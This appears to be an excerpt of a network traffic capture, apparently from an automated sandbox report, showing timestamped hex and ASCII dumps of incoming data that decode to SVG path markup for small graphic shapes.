                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13724INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13740INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                          Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13756INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13772INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13788INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13804INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                          Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13820INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15730INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15746INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15762INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15778INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15794INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15810INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15826INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15842INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15858INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC15874INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
